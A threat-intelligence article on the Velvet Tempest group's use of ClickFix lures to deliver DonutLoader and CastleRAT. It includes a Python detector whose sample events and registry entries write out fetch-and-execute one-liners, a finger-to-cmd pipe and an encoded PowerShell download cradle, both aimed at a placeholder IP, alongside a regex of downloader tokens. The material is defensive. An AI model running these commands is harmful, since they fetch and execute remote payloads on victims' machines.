Velvet Tempest Hackers Deploy DonutLoader & CastleRAT via ClickFix Technique

by Chief Editor

Velvet Tempest’s Evolving Tactics: The Rise of ClickFix and the Threat to Organizations

A sophisticated threat actor known as Velvet Tempest (also tracked as DEV-0504) is leveraging the ClickFix social engineering technique to deploy malware, including DonutLoader and CastleRAT, researchers at MalBeacon have discovered. This marks a significant evolution in ransomware deployment strategies, combining deceptive tactics with legitimate Windows utilities to evade detection.

Understanding the ClickFix Technique

ClickFix relies on tricking users into pasting obfuscated commands into the Windows Run dialog, typically under the pretext of solving a CAPTCHA or fixing a display error. Because the victim executes the command themselves, no exploit, macro or malicious attachment is needed. The pasted text initiates a chain of processes built from legitimate tools such as cmd.exe and finger.exe: finger.exe, the built-in client for the finger protocol (TCP/79), is abused to fetch the next stage from an attacker-controlled host and pipe it into cmd.exe for execution. The recent campaign observed by MalBeacon targeted a simulated U.S.-based non-profit organization with over 3,000 endpoints and 2,500 users.

ClickFix lure used by Velvet Tempest
Source: MalBeacon

A History of Devastating Ransomware

Velvet Tempest has been an active affiliate in the ransomware landscape for at least five years, demonstrating a willingness to partner with developers of various ransomware-as-a-service (RaaS) offerings. The group has been linked to some of the most damaging ransomware strains, including Ryuk, REvil, Conti, BlackMatter, BlackCat/ALPHV, LockBit, and RansomHub. While the observed intrusion did not result in the deployment of Termite ransomware, the infrastructure was in place for its potential use. Termite ransomware has previously impacted organizations like Blue Yonder and Genea.

Technical Details of the Attack Chain

Following initial access via ClickFix, Velvet Tempest operators engaged in reconnaissance, including Active Directory enumeration and harvesting of credentials stored by the Chrome browser. PowerShell scripts were used to download additional payloads, compile .NET components at runtime, and establish Python-based persistence. The ultimate goal was to deploy DonutLoader and CastleRAT, a remote access trojan used for data theft and remote control of compromised hosts.

Velvet Tempest's ransomware deployment timeline
Source: MalBeacon
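The ClickFix chain and the post-access activity above leave a distinctive trail in process-creation telemetry: an interpreter spawned by explorer.exe (which is where a Run-dialog command lands) with a download-and-execute command line, finger.exe running at all, and PowerShell spawning the C# compiler when it builds .NET components on the fly. The detector below is an added example, not MalBeacon's or the page's own code; the events are constructed to mimic Sysmon EventID 1 fields, the IP 203.0.113.10 is a documentation address, and the RunMRU sample mirrors the layout of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, where Windows records what a user typed into the Run dialog.

```python
"""Flag ClickFix-style initial access in process telemetry and Run-dialog history.
Added example with constructed sample data; field names are assumptions."""
import base64
import re
from dataclasses import dataclass

# Interpreters a Run-dialog command lands in; their parent is explorer.exe.
RUN_DIALOG_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                    "wscript.exe", "cscript.exe", "rundll32.exe"}

# Tokens typical of pasted one-liners: LOLBIN downloaders, the
# "finger user@host | cmd" trick, and PowerShell download cradles.
SUSPECT_TOKENS = re.compile(
    r"finger(\.exe)?\s|mshta\s|curl\s|certutil\s|bitsadmin\s|"
    r"\biex\b|invoke-expression|downloadstring|frombase64string|-enc(odedcommand)?\s",
    re.IGNORECASE)


@dataclass
class ProcEvent:            # constructed, modelled on Sysmon EventID 1
    parent_image: str
    image: str
    command_line: str


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext of a '-enc <base64>' argument, or None."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Return the reasons an event looks like ClickFix activity; [] if clean."""
    reasons = []
    parent = event.parent_image.rsplit("\\", 1)[-1].lower()
    child = event.image.rsplit("\\", 1)[-1].lower()
    if parent == "explorer.exe" and child in RUN_DIALOG_HOSTS:
        # A plain "cmd" from Win+R is normal; only the command line tells.
        if SUSPECT_TOKENS.search(event.command_line):
            reasons.append("download/execute tokens in command launched from explorer.exe")
        decoded = decode_encoded_command(event.command_line)
        if decoded and SUSPECT_TOKENS.search(decoded):
            reasons.append("encoded PowerShell decodes to a download cradle")
    if child == "finger.exe":
        reasons.append("finger.exe executed (TCP/79 LOLBIN downloader)")
    if parent in {"powershell.exe", "pwsh.exe"} and child == "csc.exe":
        reasons.append("PowerShell compiling .NET at runtime (Add-Type / inline C#)")
    return reasons


def parse_run_mru(values):
    """Yield Run-dialog history newest first. `values` mirrors the RunMRU key:
    single-letter values hold 'command\\1' and MRUList gives the order."""
    for letter in values.get("MRUList", ""):
        entry = values.get(letter)
        if entry:
            yield entry.rsplit("\\1", 1)[0]


_ENC = base64.b64encode("iex (irm http://203.0.113.10/a)".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd /c "finger.exe user@203.0.113.10 | cmd"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\finger.exe",
              "finger.exe user@203.0.113.10"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -enc " + _ENC),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd"),  # benign
    ProcEvent(r"C:\Program Files\Git\git-bash.exe", r"C:\Windows\System32\curl.exe",
              "curl https://example.com"),  # benign: not from the Run dialog
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              "csc.exe /noconfig /fullpaths @C:\\Users\\u\\AppData\\Local\\Temp\\x.cmdline"),
]

SAMPLE_RUNMRU = {  # constructed registry export, most recent entry is "c"
    "MRUList": "cba",
    "a": r"notepad\1",
    "b": r"cmd\1",
    "c": r"cmd /c finger.exe user@203.0.113.10 | cmd\1",
}


def triage(events=SAMPLE_EVENTS, run_mru=SAMPLE_RUNMRU):
    """Return (alerts, history): flagged events and suspicious Run-dialog entries."""
    alerts = [(e.command_line, r) for e in events if (r := classify(e))]
    history = [c for c in parse_run_mru(run_mru) if SUSPECT_TOKENS.search(c)]
    return alerts, history


if __name__ == "__main__":
    for cmd, reasons in triage()[0]:
        print(f"ALERT {cmd!r}: {'; '.join(reasons)}")
    for cmd in triage()[1]:
        print(f"RunMRU: {cmd}")
```

The explorer.exe parent check matters: the same download cradle launched from a terminal or a scheduled task is a different story, and a bare `cmd` from Win+R is ordinary user activity, so only the command line content raises an alert. Expect the csc.exe rule to fire on legitimate admin scripts that use Add-Type, so treat it as context for the other signals rather than a stand-alone detection.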

The Growing Popularity of ClickFix

The ClickFix technique is not unique to Velvet Tempest. The Interlock ransomware gang was also reported using this social engineering method in 2025, indicating a broader trend among threat actors. ClickFix works well against traditional controls because the lure contains no malicious attachment, macro or exploit for an email gateway or download scanner to catch; the victim types the payload into a trusted system dialog, so the first malicious artifact appears only in process telemetry.

FAQ

What is ClickFix? ClickFix is a social engineering technique that tricks users into executing malicious commands by pasting them into the Windows Run dialog.

Who is Velvet Tempest? Velvet Tempest (DEV-0504) is a ransomware affiliate group with a history of deploying various ransomware strains.

What is CastleRAT? CastleRAT is a remote access trojan used for data theft and control of compromised systems.

Is Termite ransomware always deployed by Velvet Tempest? Not necessarily. While the infrastructure for Termite was present in the observed attack, it wasn’t deployed in this instance.

What can organizations do to protect themselves? Train users that no legitimate website or CAPTCHA asks them to paste a command into the Run dialog or a terminal. Where the Run dialog is not needed, disable it with the Explorer NoRun policy, and block outbound TCP/79 so finger.exe cannot fetch payloads. In detection, alert on cmd.exe, powershell.exe or mshta.exe spawned by explorer.exe with download-and-execute command lines, and on finger.exe running at all. During incident response, the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU key records what a user typed into the Run dialog and will usually hold the pasted lure verbatim.

Did you know? Velvet Tempest has been active for at least five years, adapting its tactics and partnering with different ransomware developers.
